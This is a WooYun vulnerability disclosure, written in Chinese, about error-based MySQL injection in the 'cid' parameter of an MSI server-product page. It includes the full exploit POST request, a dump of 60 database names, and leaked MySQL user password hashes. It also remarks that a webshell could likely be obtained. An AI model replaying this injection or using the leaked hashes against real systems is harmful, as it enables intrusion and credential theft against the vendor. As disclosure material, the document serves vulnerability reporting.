微星msi另一站点MySQL报错注入(root)

编号120196
Urlhttp://www.wooyun.org/bug.php?action=view&id=120196
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题微星msi另一站点MySQL报错注入(root)
漏洞类型SQL注射漏洞
厂商微星
白帽子lijiejie
提交日期2015-06-13 12:28:00
公开日期2015-07-28 12:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank8
漏洞简介
微星另一站点MySQL报错注入
漏洞细节

POST /product/pages/list_ajax HTTP/1.1
Content-Length: 360
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223b4a613c9db6ea54f743f14ae1c9a457%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22220.181.109.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1434115554%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07644a2639b0160780b4ae0d67419fcc
Host: server.msi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
c=server&cid=*&d=list&p=product&sk=Server+Board&sw=ajax&title=Server+Board


cid可注入。

POC

current database:    'msi_www_db'
available databases [60]:
[*] information_schema
[*] msi_al_db
[*] msi_ar_db
[*] msi_au_db
[*] msi_be_db
[*] msi_bg_db
[*] msi_br_db
[*] msi_ca_db
[*] msi_cafr_db
[*] msi_carib_db
[*] msi_cms
[*] msi_cn_db
[*] msi_csr
[*] msi_cz_db
[*] msi_de_db
[*] msi_dealer
[*] msi_dk_db
[*] msi_dk_db_bak
[*] msi_es_db
[*] msi_eu_db
[*] msi_fi_db
[*] msi_fr_db
[*] msi_gr_db
[*] msi_hu_db
[*] msi_in_db
[*] msi_it_db
[*] msi_jp_db
[*] msi_kr_db
[*] msi_latam_db
[*] msi_lk_db
[*] msi_mea_db
[*] msi_mx_db
[*] msi_mx_db_bak
[*] msi_my_db
[*] msi_nl_db
[*] msi_no_db
[*] msi_pl_db
[*] msi_pl_db_temp
[*] msi_pt_db
[*] msi_pt_db_back
[*] msi_raptor_db
[*] msi_ro_db
[*] msi_rs_db
[*] msi_ru_db
[*] msi_se_db
[*] msi_sk_db
[*] msi_th_db
[*] msi_tr_db
[*] msi_tw_db
[*] msi_ua_db
[*] msi_uk_db
[*] msi_us_db
[*] msi_vn_db
[*] msi_www_db
[*] msi_www_db_bak20150518
[*] msi_za_db
[*] mysql
[*] performance_schema
[*] root
[*] test


dump mysql.user表,两个用户的密码均未破解成功:

root        | <blank> | *92C1D9C9BCCE50690A8447295415750781153EED
172.16.16.% | msi_ap_user | <blank> | *F7C59E45D6D9357ABD9735D5F057B8F041CC3098


有一定的几率可得到webshell

修复方案

参数过滤

状态信息 2015-06-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝漏洞Rank:8 (WooYun评价)